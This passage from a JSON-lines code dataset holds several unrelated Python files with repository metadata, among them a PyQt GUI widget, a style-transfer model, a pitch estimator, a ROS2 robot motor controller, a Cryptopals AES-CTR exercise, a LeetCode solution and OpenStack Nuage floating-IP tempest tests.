(i, pred))\n\n# Commit the changes and close the connection\nconn.commit()\nconn.close()\n\nconn = sqlite3.connect('data/predictions_test.db')\ndf = pd.read_sql_query(\"SELECT * FROM predictions\", conn)\nconn.close()\n\nprint(df)","repo_name":"rubentak/weather_prediction_classification","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71447711903","text":"#--------------------------------------------------------------------------\n# File and Version Information:\n# $Id$\n#\n# Description:\n# GUIROIMask...\n#------------------------------------------------------------------------\n\n\"\"\"GUI for CalibManager.\n\nThis software was developed for the SIT project. If you use all or \npart of it, please give an appropriate acknowledgment.\n\n@version $Id$\n\n@author Mikhail S. Dubrovin\n\"\"\"\nfrom __future__ import absolute_import\n\n#--------------------------------\n__version__ = \"$Revision$\"\n#--------------------------------\n\nimport os\nimport numpy as np\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\n#-----------------------------\n# Imports for other modules --\n#-----------------------------\n\n#from CalibManager.Frame import Frame\nfrom CalibManager.Logger import logger\nfrom .GUIMaskEditor import *\n\n#------------------------------\n#class GUIROIMask(Frame) : \nclass GUIROIMask(QtWidgets.QWidget) :\n \"\"\"QWidger wrapping ROI mask processing.\n \"\"\"\n\n def __init__(self, parent=None, app=None) :\n\n self.name = 'GUIROIMask'\n QtWidgets.QWidget.__init__(self, parent)\n #Frame.__init__(self, parent, mlw=1)\n\n self.setGeometry(10, 25, 800, 300)\n self.setWindowTitle('ROI Mask')\n\n self.win = GUIMaskEditor(self)\n #self.lab_status = QtGui.QLabel('Status: ')\n\n self.vbox = QtWidgets.QVBoxLayout() \n self.vbox.addWidget(self.win)\n self.vbox.addStretch(1)\n #self.vbox.addWidget(self.lab_status)\n\n self.hbox = QtWidgets.QHBoxLayout() \n self.hbox.addStretch(1)\n self.hbox.addLayout(self.vbox)\n self.hbox.addStretch(1)\n\n self.setLayout(self.hbox)\n \n self.showToolTips()\n self.setStyle()\n\n #self.setStatus(0)\n cp.guiroimask = self\n self.move(10,25)\n \n #print 'End of init'\n \n\n def showToolTips(self):\n pass\n #self.setToolTip('ROI mask wrapping widget') \n\n\n def setStyle(self):\n self.setMinimumSize(800,300)\n #self.setMaximumWidth(800)\n\n\n# def resizeEvent(self, e):\n# pass\n\n\n# def moveEvent(self, e):\n# pass\n\n\n def closeEvent(self, event):\n logger.debug('closeEvent', self.name)\n\n try : cp.maskeditor.close()\n except : pass\n\n cp.guiroimask = None\n\n\n# def onExit(self):\n# logger.debug('onExit', self.name)\n# self.close()\n\n\n# def setStatus(self, status_index=0, msg='Waiting for the next command'):\n# list_of_states = ['Good','Warning','Alarm']\n# if status_index == 0 : self.lab_status.setStyleSheet(cp.styleStatusGood)\n# if status_index == 1 : self.lab_status.setStyleSheet(cp.styleStatusWarning)\n# if status_index == 2 : self.lab_status.setStyleSheet(cp.styleStatusAlarm)\n# #self.lab_status.setText('Status: ' + list_of_states[status_index] + msg)\n# self.lab_status.setText(msg)\n\n#------------------------------\n\nif __name__ == \"__main__\" :\n import sys\n app = QtWidgets.QApplication(sys.argv)\n ex = GUIROIMask()\n ex.show()\n app.exec_()\n\n#------------------------------\n","repo_name":"lcls-psana/CalibManager","sub_path":"src/GUIROIMask.py","file_name":"GUIROIMask.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"40021353712","text":"from __future__ import print_function\nimport torch.nn as nn\nimport torchvision.models as models\nimport numpy as np\nfrom mylibs import ContentLoss, StyleLoss, TVLoss, ContentFidelity\n\ndef GC(x,s):\n # GE\n GC = 0\n for i in range(3):\n hist_x = np.histogram(x[:,:,i], bins = 20)[0]\n hist_s = np.histogram(s[:,:,i], bins = 20)[0]\n GC += hist_x*hist_s/(np.linalg.norm(hist_x)*np.linalg.norm(hist_s)) \n GC /= 3\n return np.sum(GC)\n\nclass CNNMRF(nn.Module):\n def __init__(self, style_image, content_image, model, device, content_weight, style_weight, tv_weight, gpu_chunck_size=256, mrf_style_stride=2,\n mrf_synthesis_stride=2):\n super(CNNMRF, self).__init__()\n # fine tune alpha_content to interpolate between the content and the style\n self.content_weight = content_weight\n self.style_weight = style_weight\n self.tv_weight = tv_weight\n self.patch_size = 3\n self.device = device\n self.gpu_chunck_size = gpu_chunck_size\n self.mrf_style_stride = mrf_style_stride\n self.mrf_synthesis_stride = mrf_synthesis_stride\n # self.style_layers = [7,11] # # vgg19 [11,20], resnet_teacher_note [5, slice(None, 3)], resnet_style [11,13]\n # self.style_layers_resnet = [1,5]\n # self.content_layers = [15] # # vgg19 [22], resnet content [19]\n # self.content_layers_resnet = [2]\n if model == 'vgg':\n self.style_layers = [11,20] # vgg19 [11,20] resnet_teacher_note [5, slice(None, 3)]\n self.content_layers = [22] # vgg19 [22]\n self.model, self.content_losses, self.style_losses, self.tv_loss = \\\n self.get_model_and_losses(style_image=style_image, content_image=content_image)\n \n elif model == 'resnet':\n self.style_layers = [7,11]\n self.content_layers = [15]\n self.model, self.content_losses, self.style_losses, self.tv_loss = \\\n self.get_model_and_losses_resnet(style_image=style_image, content_image=content_image)\n\n def forward(self, synthesis):\n \"\"\"\n calculate loss and return loss\n :param synthesis: synthesis image\n :return:\n \"\"\"\n self.model(synthesis)\n style_score = 0\n content_score = 0\n tv_score = self.tv_loss.loss\n CF_score = 0\n SF_score = 0\n\n # calculate style loss\n for sl in self.style_losses:\n style_score += sl.loss\n SF_score += sl.fidelity # local pattern fidelity\n\n\n # calculate content loss\n for cl in self.content_losses:\n content_score += cl.loss\n CF_score += cl.fidelity # content fidelity\n\n\n # calculate final loss\n scale = 1\n loss = scale*(self.style_weight * style_score + self.content_weight * content_score + self.tv_weight * tv_score)\n CF_score_final = CF_score/len(self.content_losses)\n SF_score_final = SF_score/len(self.style_losses)\n return loss, CF_score_final, SF_score_final\n\n def update_style_and_content_image(self, style_image, content_image):\n \"\"\"\n update the target of style loss layer and content loss layer\n :param style_image:\n :param content_image:\n :return:\n \"\"\"\n # update the target of style loss layer\n x = style_image.clone()\n next_style_idx = 0\n i = 0\n for layer in self.model:\n if isinstance(layer, TVLoss) or isinstance(layer, ContentLoss) or isinstance(layer, StyleLoss): # or isinstance(layer, ContentFidelity):\n continue\n if next_style_idx >= len(self.style_losses):\n break\n x = layer(x)\n if i in self.style_layers:\n # extract feature of style image in vgg19 as style loss target\n self.style_losses[next_style_idx].update(x)\n next_style_idx += 1\n i += 1\n\n # update the target of content loss layer\n x = content_image.clone()\n next_content_idx = 0\n i = 0\n for layer in self.model:\n if isinstance(layer, TVLoss) or isinstance(layer, ContentLoss) or isinstance(layer, StyleLoss): # or isinstance(layer, ContentFidelity):\n continue\n if next_content_idx >= len(self.content_losses):\n break\n x = layer(x)\n if i in self.content_layers:\n # extract feature of content image in vgg19 as content loss target\n self.content_losses[next_content_idx].update(x)\n next_content_idx += 1\n i += 1\n \n # def get_metrics(self, synthesis):\n \n\n def get_model_and_losses(self, style_image, content_image):\n \"\"\"\n create network model by intermediate layer of vgg19 and some customized layer(style loss, content loss and tv loss)\n :param style_image:\n :param content_image:\n :return:\n \"\"\"\n vgg = models.vgg19(pretrained=True).to(self.device)\n model = nn.Sequential()\n content_losses = []\n style_losses = []\n # add tv loss layer\n tv_loss = TVLoss()\n model.add_module('tv_loss', tv_loss)\n\n next_content_idx = 0\n next_style_idx = 0\n\n for i in range(len(vgg.features)):\n if next_content_idx >= len(self.content_layers) and next_style_idx >= len(self.style_layers):\n break\n # add layer of vgg19\n layer = vgg.features[i]\n name = str(i)\n print(name, layer)\n model.add_module(name, layer)\n print('model: ', model)\n\n # add content loss layer\n if i in self.content_layers:\n target = model(content_image).detach()\n content_loss = ContentLoss(target)\n model.add_module(\"content_loss_{}\".format(next_content_idx), content_loss)\n content_losses.append(content_loss)\n next_content_idx += 1\n\n # add style loss layer\n if i in self.style_layers:\n target_feature = model(style_image).detach()\n style_loss = StyleLoss(target_feature, patch_size=self.patch_size, mrf_style_stride=self.mrf_style_stride,\n mrf_synthesis_stride=self.mrf_synthesis_stride, gpu_chunck_size=self.gpu_chunck_size, device=self.device)\n\n model.add_module(\"style_loss_{}\".format(next_style_idx), style_loss)\n style_losses.append(style_loss)\n next_style_idx += 1\n\n return model, content_losses, style_losses, tv_loss\n\n def get_model_and_losses_resnet(self, style_image, content_image):\n \"\"\"\n create network model by intermediate layer of resnet and some customized layer(style loss, content loss and tv loss)\n :param style_image:\n :param content_image:\n :return:\n \"\"\"\n vgg = models.resnet34(pretrained=True).to(self.device)\n model = nn.Sequential()\n content_losses = []\n style_losses = []\n content_fidelities = []\n # add tv loss layer\n tv_loss = TVLoss()\n model.add_module('tv_loss', tv_loss)\n # print(vgg._modules['layer1']._modules['2']._modules.keys())\n next_content_idx = 0\n next_style_idx = 0\n idx = 4\n for i in range(len(list(vgg.children())[:])):\n if next_content_idx >= len(self.content_layers) and next_style_idx >= len(self.style_layers):\n break\n # add layer of ResNet\n layer = list(vgg.children())[:][i]\n name = str(i)\n \n if i < 4:\n print(name, layer)\n model.add_module(name, layer)\n print('model: ', model)\n\n # add content loss layer\n if i in self.content_layers:\n target = model(content_image).detach()\n content_loss = ContentLoss(target)\n model.add_module(\"content_loss_{}\".format(next_content_idx), content_loss)\n content_losses.append(content_loss)\n \n next_content_idx += 1\n\n # add style loss layer\n if i in self.style_layers:\n target_feature = model(style_image).detach()\n style_loss = StyleLoss(target_feature, patch_size=self.patch_size, mrf_style_stride=self.mrf_style_stride,\n mrf_synthesis_stride=self.mrf_synthesis_stride, gpu_chunck_size=self.gpu_chunck_size, device=self.device)\n\n model.add_module(\"style_loss_{}\".format(next_style_idx), style_loss)\n style_losses.append(style_loss)\n next_style_idx += 1 \n else:\n for j in range(len(list(layer.children()))):\n sublayer = list(layer.children())[j]\n subname = str(j+idx)\n model.add_module(subname, sublayer)\n print('model: ', model)\n\n # add content loss layer\n if (j+idx) in self.content_layers:\n target = model(content_image).detach()\n\n content_loss = ContentLoss(target)\n model.add_module(\"content_loss_{}\".format(next_content_idx), content_loss)\n content_losses.append(content_loss)\n \n next_content_idx += 1\n\n # add style loss layer\n if (j+idx) in self.style_layers:\n target_feature = model(style_image).detach()\n style_loss = StyleLoss(target_feature, patch_size=self.patch_size, mrf_style_stride=self.mrf_style_stride,\n mrf_synthesis_stride=self.mrf_synthesis_stride, gpu_chunck_size=self.gpu_chunck_size, device=self.device)\n\n model.add_module(\"style_loss_{}\".format(next_style_idx), style_loss)\n style_losses.append(style_loss)\n next_style_idx += 1\n\n if j == len(list(layer.children())) - 1:\n idx = j+idx + 1\n\n return model, content_losses, style_losses, tv_loss\n","repo_name":"minhIMT97/Image-Synthesis-with-CNN-MRF","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":10259,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"29127601676","text":"from sphinxbase.sphinxbase import Yin\nimport wave\nimport numpy as np\nimport ctypes\n\ndef f0estimate(wavFile, ltWindowLength=None):\n\n wv=wave.open(wavFile, 'rb')\n\n noOfSamples = wv.getnframes()\n windowPeriod = 0.025\n sampleRate = wv.getframerate()\n frameLength = int(sampleRate * windowPeriod)\n noOfFrames = noOfSamples/frameLength\n voiceTh = 0.1\n searchRange = 0.2\n smoothWindow = 2\n f0Max = 350\n f0Min = 85\n\n #Yin flen, voice_thresh, search_range, smooth_window\n yin = Yin(frameLength,voiceTh, searchRange, smoothWindow)\n yin.start()\n rawData = np.fromstring(wv.readframes(-1), 'Int16');\n data = np.ascontiguousarray(rawData, dtype=np.int16)\n f0s = []\n duration=0\n rejects = {'pvoice':0, 'range': 0, 'diff': 0}\n for i in xrange(noOfFrames):\n if ltWindowLength is not None and duration > ltWindowLength:\n break\n frame = data[i*frameLength:(i+1)*frameLength]\n yin.write(frame)\n result, period, diff = yin.read()\n if result and period > 0:\n pvoice=0\n if diff < 32768:\n pvoice = 1.0 - float(diff) / 32768\n if pvoice > 0.7:\n f0 = float(sampleRate)/period\n if f0 > f0Min and f0 < f0Max:\n duration = duration + windowPeriod\n f0s.append(f0)\n else:\n rejects['range'] = rejects['range'] + 1\n else:\n rejects['pvoice'] = rejects['pvoice'] + 1\n else:\n rejects['diff'] = rejects['diff'] + 1\n yin.end()\n wv.close()\n return (float(noOfSamples)/sampleRate, f0s, rejects)\n\ndef computeTrajectoryStatistics(f0s):\n f0s_arr = np.array(f0s)\n f0_mean, f0_std, f0_max, f0_min, f0_median = np.mean(f0s_arr), np.std(f0s_arr), np.max(f0s_arr), np.min(f0s_arr), np.median(f0s_arr)\n return (f0_mean, f0_std, f0_max, f0_min, f0_median)\n","repo_name":"mihaipstef/asr-f0","sub_path":"f0test/lib/f0.py","file_name":"f0.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"27409119300","text":"import rclpy\nfrom rclpy.node import Node\nimport time\nimport signal\nimport sys\nimport json\nfrom Adafruit_MotorHAT import Adafruit_MotorHAT\nfrom std_msgs.msg import String\nfrom geometry_msgs.msg import Twist\n\nclass JetBotMotorController(Node):\n\n def __init__(self):\n super().__init__('jetbot_motor_controller')\n self.declare_parameter('i2c_bus')\n self.declare_parameter('default_speed')\n self.declare_parameter('max_pwm')\n self.declare_parameter('type', 'waveshare')\n self.start_subscriptions();\n self.set_speed(self.get_parameter('default_speed')._value)\n self.motor_driver = Adafruit_MotorHAT(i2c_bus=int(self.get_parameter('i2c_bus')._value))\n self.motor_left_ID = 1\n self.motor_right_ID = 2\n self.motor_left = self.motor_driver.getMotor(self.motor_left_ID)\n self.motor_right = self.motor_driver.getMotor(self.motor_right_ID)\n self.all_stop()\n \n def start_subscriptions(self):\n self.cmd_vel = self.create_subscription(Twist, 'cmd_vel', self.on_cmd_vel, 1)\n self.cmd_dir = self.create_subscription(String, 'cmd_dir', self.on_cmd_dir, 1)\n self.cmd_raw = self.create_subscription(String, 'cmd_raw', self.on_cmd_raw, 10)\n self.cmd_str = self.create_subscription(String, 'cmd_str', self.on_cmd_str, 10)\n \n # directional commands (degree, speed)\n def on_cmd_dir(self, msg):\n self.get_logger().info('cmd_dir=%s' % msg.data)\n \n # velocity, twist commands (Twist)\n def on_cmd_vel(self, msg):\n x = msg.linear.x\n y = msg.angular.z/10\n\t\t \n if x>0 and y<0: #backward right\n self.set_pwm(self.motor_left_ID, (abs(y)+0.1))\n self.set_pwm(self.motor_right_ID, (0.2+y+0.1))\n elif x>0 and y>0: #backward left\n self.set_pwm(self.motor_left_ID, (0.2-y+0.1))\n self.set_pwm(self.motor_right_ID, (y+0.1))\n elif x<0 and y>0: #forward left\n self.set_pwm(self.motor_left_ID, (-(0.2-y)-0.1))\n self.set_pwm(self.motor_right_ID, -(y+0.1))\n elif x<0 and y<0: #forward right\n self.set_pwm(self.motor_left_ID, y-0.1)\n self.set_pwm(self.motor_right_ID, (-(0.2+y)-0.1))\n else:\n self.all_stop()\n \n # raw L/R motor commands (speed, speed)\n def on_cmd_raw(self, msg):\n self.get_logger().info(' cmd_raw=%s' % msg.data)\n move_data_recv = json.loads(msg.data)\n self.set_pwm(self.motor_left_ID, float(move_data_recv['left']))\n self.set_pwm(self.motor_right_ID, float(move_data_recv['right']))\n \n # simple string commands (left/right/forward/backward/stop)\n def on_cmd_str(self, msg):\n self.get_logger().info(' cmd_str=%s' % msg.data)\n self.move_dir(msg.data.lower())\n \n def set_pwm(self, motor_ID, value):\n \n max_pwm = float(self.get_parameter('max_pwm')._value)\n speed = int(min(max(abs(value * max_pwm), 0), max_pwm))\n \n if motor_ID == 1:\n motor = self.motor_left\n elif motor_ID == 2:\n motor = self.motor_right\n else:\n self.get_logger().error('set_pwm(%d, %f) -> invalid motor_ID=%d', motor_ID, value, motor_ID)\n return\n \n motor.setSpeed(speed)\n \n if value > 0:\n motor.run(Adafruit_MotorHAT.FORWARD)\n else:\n motor.run(Adafruit_MotorHAT.BACKWARD)\n \n def set_speed(self, speed):\n self.speed = float(speed)\n\n def move_dir(self, val):\n if val == \"left\":\n self.set_pwm(self.motor_left_ID, self.speed)\n self.set_pwm(self.motor_right_ID, (-1 * self.speed)) \n elif val == \"right\":\n self.set_pwm(self.motor_left_ID, self.speed)\n self.set_pwm(self.motor_right_ID, self.speed) \n elif val == \"backward\":\n self.set_pwm(self.motor_left_ID, self.speed)\n self.set_pwm(self.motor_right_ID, self.speed)\n elif val == \"forward\":\n self.set_pwm(self.motor_left_ID, (-1 * self.speed))\n self.set_pwm(self.motor_right_ID, (-1 * self.speed)) \n elif val == \"stop\":\n self.all_stop()\n else:\n self.get_logger().error('Direction not supported.')\n\n def all_stop(self):\n self.motor_left.setSpeed(0)\n self.motor_right.setSpeed(0)\n self.motor_left.run(Adafruit_MotorHAT.RELEASE)\n self.motor_right.run(Adafruit_MotorHAT.RELEASE)\n\ndef main(args=None):\n\n rclpy.init(args=args)\n\n node = JetBotMotorController()\n \n def stop_node(*args):\n node.all_stop()\n print(\"Releasing i2c motors and stopping the node...\")\n rclpy.shutdown()\n return True\n \n signal.signal(signal.SIGINT, stop_node)\n signal.signal(signal.SIGTERM, stop_node)\n \n try:\n rclpy.spin(node)\n except KeyboardInterrupt:\n pass\n\n node.destroy_node()\n \nif __name__ == '__main__':\n main()\n ","repo_name":"kyopark2014/aws-robomaker","sub_path":"cloud-connected-robots/building-cloud-connected-robots-reinvent2021/robot_ws/src/jetbot_base/jetbot_base/jetbot_motor_controller.py","file_name":"jetbot_motor_controller.py","file_ext":"py","file_size_in_byte":5007,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"30303602424","text":"from .utils import *\nfrom typing import List\nfrom .lcd_serial import LCD\n\n__all__ = ['Console']\n\nclass Console(LCD):\n def __init__(self, ser=None) -> None:\n self.ROM = [None]*8\n\n def send_cmd(self, cmd:str, data): \n if cmd == 'prn':\n print(data)\n elif cmd == 'ccg':\n print('ROM:',self.ROM)\n self.ROM[data[0]] = data[1:]\n elif cmd == 'prA':\n w = data[0]\n data = data[1:w+1]\n LROM = [self.ROM[i] if i != ord(' ') else ' ' for i in data if isinstance(i, int)]\n for L in range(8):\n s = ''\n for c in range(len(LROM)):\n # if self.ROM[c]:\n if LROM[c]:\n r = LROM[c]\n if r == ' ':\n s += ' '\n continue\n for x in range(5):\n if r[L] & (1 << (4-x)) != 0:\n s += '1'\n else:\n s += '0'\n s += ' '\n print(s.replace('0','░░').replace('1','██'))\n\n\n def send_cmdSafe(self, cmd:str, data:List):\n self.send_cmd(cmd, data)\n\n def send(self, s:bytearray):\n pass\n\n def ccg(self, index:int, chars:List[int], asleep:float=0.5):\n super().ccg(index, chars, 0)\n","repo_name":"x2nie/arabic-arduino","sub_path":"python/arabicArduino/lcd_console.py","file_name":"lcd_console.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"1568667350","text":"import binascii\n\nfrom python.common.aes import xcryptCtr\n\n# nonce = 0\n# key = b'YELLOW SUBMARINE'\n# text = binascii.a2b_base64('L77na/nrFsKvynd6HzOoG7GHTLXsTVu9qvY/2syLXzhPweyyMTJULu/6/kXX0KSvoOLSFQ==')\n\nnonce = 1\nkey = b'YELLOW SUBMARINE'\ntext = b'\\x86kTQ\\x8d\\x8a\\xf4\\xc7\\x84k\\x8fU\\xccN\\xab\\xb5j\\xb4\\x13\\xa0y\\xb4\\xddc\\xbb\\xb1\\x97\\xfc\\x83\\x7f\\xd8i'\n\nif __name__ == '__main__':\n print(xcryptCtr(text, key, nonce))","repo_name":"uklineale/cryptoPals","sub_path":"python/set3/eighteen.py","file_name":"eighteen.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"72900790942","text":"\"\"\"\nhttps://leetcode.com/problems/maximum-length-of-subarray-with-positive-product/\n\"\"\"\n\n\nclass Solution:\n def getMaxLen(self, nums: list[int]) -> int:\n N = len(nums)\n positives = [0] * N\n negatives = [0] * N\n\n if nums[0] > 0:\n positives[0] = 1\n elif nums[0] < 0:\n negatives[0] = 1\n\n for i in range(1, N):\n if nums[i] > 0:\n positives[i] = 1 + positives[i - 1] if positives[i - 1] else 1\n negatives[i] = 1 + negatives[i - 1] if negatives[i - 1] else 0\n elif nums[i] < 0:\n positives[i] = 1 + negatives[i - 1] if negatives[i - 1] else 0\n negatives[i] = 1 + positives[i - 1] if positives[i - 1] else 1\n\n return max(positives)\n","repo_name":"eronekogin/leetcode","sub_path":"2022/maximum_length_of_subarray_with_positive_product.py","file_name":"maximum_length_of_subarray_with_positive_product.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7603983482","text":"import netaddr\nimport uuid\n\nfrom oslo_log import log as logging\n\nfrom nuagetempest.lib.test import nuage_test\nfrom tempest.api.network.admin import test_floating_ips_admin_actions\nfrom tempest.lib.common.utils import data_utils\nfrom tempest.lib import exceptions\nfrom tempest import config\nfrom nuagetempest.lib import service_mgmt\nfrom nuagetempest.lib.utils import constants as nuage_constants\nfrom nuagetempest.services.nuage_client import NuageRestClient\nfrom nuagetempest.services.nuage_network_client import NuageNetworkClientJSON\nfrom tempest.api.network import base\n\n\nfrom tempest import test\n\nCONF = config.CONF\nLOG = logging.getLogger(__name__)\n\nclass FloatingIPTestAdminNuage(base.BaseAdminNetworkTest):\n\n @classmethod\n def setup_clients(cls):\n super(FloatingIPTestAdminNuage, cls).setup_clients()\n cls.nuage_vsd_client = NuageRestClient()\n\n # Overriding cls.client with Nuage network client\n cls.client = NuageNetworkClientJSON(\n cls.os.auth_provider,\n CONF.network.catalog_type,\n CONF.network.region or CONF.identity.region,\n endpoint_type=CONF.network.endpoint_type,\n build_interval=CONF.network.build_interval,\n build_timeout=CONF.network.build_timeout,\n **cls.os.default_params)\n\n cls.service_manager = service_mgmt.ServiceManager()\n\n if not cls.service_manager.is_service_running(nuage_constants.NEUTRON_SERVICE):\n cls.service_manager.comment_configuration_attribute(\n CONF.nuage_sut.nuage_plugin_configuration,\n nuage_constants.NUAGE_UPLINK_GROUP,\n nuage_constants.NUAGE_UPLINK)\n cls.service_manager.start_service(nuage_constants.NEUTRON_SERVICE)\n cls.service_manager.wait_for_service_status(nuage_constants.NEUTRON_SERVICE)\n\n @classmethod\n def resource_setup(cls):\n super(FloatingIPTestAdminNuage, cls).resource_setup()\n # resources required for uplink subnet\n cls.gateway = None\n cls.gatewayport = None\n cls.gatewayvlan = None\n cls.uplinksubnet = None\n\n @classmethod\n def resource_cleanup(cls):\n if cls.uplinksubnet:\n cls.nuage_vsd_client.delete_uplink_subnet(\n cls.uplinksubnet[0]['ID']) \n if cls.gatewayvlan:\n cls.nuage_vsd_client.delete_gateway_vlan(cls.gatewayvlan[0]['ID'])\n if cls.gatewayport:\n cls.nuage_vsd_client.delete_gateway_port(cls.gatewayport[0]['ID'])\n if cls.gateway:\n cls.nuage_vsd_client.delete_gateway(cls.gateway[0]['ID'])\n super(FloatingIPTestAdminNuage, cls).resource_cleanup()\n \n @classmethod\n def create_gateway_port_vlan(cls, gw_type='VRSG', vlan_no=200):\n gw_name = data_utils.rand_name('gw-')\n cls.gateway = cls.nuage_vsd_client.create_gateway(\n gw_name, str(uuid.uuid4()), gw_type, None)\n gw_port_name = data_utils.rand_name('gw-port-')\n cls.gatewayport = cls.nuage_vsd_client.create_gateway_port(\n gw_port_name, 'test', 'ACCESS', cls.gateway[0]['ID']) \n cls.gatewayvlan = cls.nuage_vsd_client.create_gateway_vlan(\n cls.gatewayport[0]['ID'], 'test', vlan_no)\n \n\n# @classmethod\n def create_uplink_subnet(cls, parentID=\"\"):\n uplink_subnet_dict = {}\n uplink_subnet_dict['name'] = \"uplink-sub1\"\n uplink_subnet_dict['address'] = \"210.20.0.0\"\n uplink_subnet_dict['netmask'] = \"255.255.255.0\"\n uplink_subnet_dict['gateway'] = '210.20.0.1'\n uplink_subnet_dict['uplinkVportName'] = 'vlan1'\n uplink_subnet_dict['uplinkInterfaceIP'] = '210.20.0.2'\n uplink_subnet_dict['uplinkInterfaceMAC'] = \"00:11:22:33:44:55\"\n uplink_subnet_dict['uplinkGWVlanAttachmentID'] = cls.gatewayvlan[0]['ID']\n uplink_subnet_dict['sharedResourceParentID'] = parentID\n cls.uplinksubnet = cls.nuage_vsd_client.create_uplink_subnet(\n **uplink_subnet_dict)\n cls.addCleanup(cls.delete_uplink_subnet, str(cls.uplinksubnet[0]['ID']))\n\n def delete_uplink_subnet(self, subnet_id):\n self.uplinksubnet = None\n return self.nuage_vsd_client.delete_uplink_subnet(subnet_id)\n\n @classmethod\n def delete_gateway_port_vlan(cls):\n if cls.gatewayvlan:\n cls.nuage_vsd_client.delete_gateway_vlan(cls.gatewayvlan[0]['ID'])\n cls.gatewayvlan = None\n if cls.gatewayport:\n cls.nuage_vsd_client.delete_gateway_port(cls.gatewayport[0]['ID'])\n cls.gatewayport = None\n if cls.gateway:\n cls.nuage_vsd_client.delete_gateway(cls.gateway[0]['ID'])\n cls.gateway = None\n \n def create_fip_subnet(self, cidr, nuage_uplink=None):\n name = data_utils.rand_name('network-')\n kwargs = {'name': name,\n 'router:external': True}\n body = self.admin_networks_client.create_network(**kwargs)\n pubnet = body['network']\n self.addCleanup(self.admin_networks_client.delete_network, pubnet['id'])\n fipsub_name = data_utils.rand_name('fipsub-')\n kwargs = {'name': fipsub_name,\n 'network_id': pubnet['id'],\n 'ip_version': 4,\n 'cidr': cidr}\n if nuage_uplink:\n kwargs.update({'nuage_uplink': nuage_uplink})\n body = self.admin_subnets_client.create_subnet(**kwargs)\n self.assertEqual(fipsub_name, body['subnet']['name'])\n self.assertEqual(cidr, body['subnet']['cidr'])\n return body['subnet']\n\n def delete_fip_subnet(self, fipsubID):\n try:\n self.admin_subnets_client.delete_subnet(fipsubID)\n except Exception as exc:\n LOG.exception(exc)\n\n def add_uplink_key_to_plugin_file(self, nuage_uplink):\n self.service_manager.stop_service(nuage_constants.NEUTRON_SERVICE)\n # Add the shared zone ID to the plugin.ini file\n self.service_manager.set_configuration_attribute(\n CONF.nuage_sut.nuage_plugin_configuration,\n nuage_constants.NUAGE_UPLINK_GROUP,\n nuage_constants.NUAGE_UPLINK, \n nuage_uplink)\n self.service_manager.start_service(nuage_constants.NEUTRON_SERVICE)\n self.service_manager.wait_for_service_status(nuage_constants.NEUTRON_SERVICE)\n\n\n def delete_uplink_key_from_plugin_file(self):\n self.service_manager.stop_service(nuage_constants.NEUTRON_SERVICE)\n self.service_manager.comment_configuration_attribute(\n CONF.nuage_sut.nuage_plugin_configuration,\n nuage_constants.NUAGE_UPLINK_GROUP,\n nuage_constants.NUAGE_UPLINK)\n self.service_manager.start_service(nuage_constants.NEUTRON_SERVICE)\n self.service_manager.wait_for_service_status(nuage_constants.NEUTRON_SERVICE)\n\n @test.attr(type='smoke')\n def test_fipsubs_in_shared_domain_with_plugin_file(self):\n # TODO: add the test code here\n raise(exceptions.NotImplemented)\n pass\n\n @test.attr(type='smoke')\n def test_create_fipsubs_in_shared_domain(self):\n # Create first FIP subnet\n fipsub1 = self.create_fip_subnet('172.40.0.0/24')\n self.addCleanup(self.delete_fip_subnet, fipsub1['id'])\n\n # Get FIP parentID\n fip_extID = self.nuage_vsd_client.get_vsd_external_id(fipsub1['id'])\n nuage_fipsubnet1 = self.nuage_vsd_client.get_sharedresource(\n filters='externalID', filter_value= fip_extID)\n self.assertEqual(fipsub1['id'], nuage_fipsubnet1[0]['name']) \n\n # Create uplink subnet on VSD\n self.create_gateway_port_vlan()\n\n self.create_uplink_subnet(parentID=nuage_fipsubnet1[0]['parentID'])\n\n # Verify the uplink-subnet parentID with the FIPsubnet parentID\n self.assertEqual(nuage_fipsubnet1[0]['parentID'],\n self.uplinksubnet[0]['sharedResourceParentID'])\n # Create FIP subnet with nuage_uplink option \n fipsub2 = self.create_fip_subnet('198.40.0.0/24', nuage_fipsubnet1[0]['parentID'])\n self.addCleanup(self.delete_fip_subnet, fipsub2['id'])\n fip_extID = self.nuage_vsd_client.get_vsd_external_id(fipsub2['id'])\n nuage_fipsubnet2 = self.nuage_vsd_client.get_sharedresource(\n filters='externalID', filter_value= fip_extID)\n self.assertEqual(fipsub2['id'], nuage_fipsubnet2[0]['name']) \n self.assertEqual(nuage_fipsubnet1[0]['parentID'],\n nuage_fipsubnet2[0]['parentID'])\n #self.delete_gateway_port_vlan()\n\n @test.attr(type='smoke')\n def test_show_fipsubs_in_shared_domain(self):\n fipsub = self.create_fip_subnet('172.40.0.0/24')\n self.addCleanup(self.delete_fip_subnet, fipsub['id'])\n # Check the nuage_uplink field in subnet-show\n body = self.admin_subnets_client.show_subnet(fipsub['id'])\n fipsub_show = body['subnet']\n # Get FIP parentID in VSD\n fip_extID = self.nuage_vsd_client.get_vsd_external_id(fipsub['id'])\n nuage_fipsubnet = self.nuage_vsd_client.get_sharedresource(\n filters='externalID', filter_value= fip_extID)\n self.assertEqual(fipsub_show['id'], nuage_fipsubnet[0]['name'])\n self.assertEqual(fipsub_show['nuage_uplink'], nuage_fipsubnet[0]['parentID'])\n\n def test_fipsubs_in_shared_domain_negative(self):\n # Create fipsub with invalid UUID for nuage_uplink\n name = data_utils.rand_name('network-')\n kwargs = {'name': name,\n 'router:external': True}\n body = self.admin_networks_client.create_network(**kwargs)\n pubnet = body['network']\n 